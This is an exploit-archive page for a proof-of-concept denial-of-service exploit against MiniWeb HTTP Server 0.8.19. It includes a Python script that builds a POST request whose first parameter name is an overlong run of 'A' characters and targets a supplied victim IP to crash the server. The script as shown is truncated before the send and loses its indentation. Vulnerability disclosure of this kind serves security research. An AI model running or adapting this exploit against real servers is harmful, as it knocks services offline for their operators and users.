MiniWeb HTTP Server 0.8.19 Buffer Overflow

MiniWeb HTTP Server version 0.8.19 buffer overflow proof of concept exploit.

MD5 | 1c43ae8b9d8816d4006b30d2418d1582

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team -


MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.


The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here:



import socket
import sys
import struct

if len(sys.argv) != 2 :
print "[+] Usage : python [VICTIM_IP]"

TCP_IP = sys.argv[1]
TCP_PORT = 8000

xx = "A"*2038 #4085

http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host:\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."

Related Posts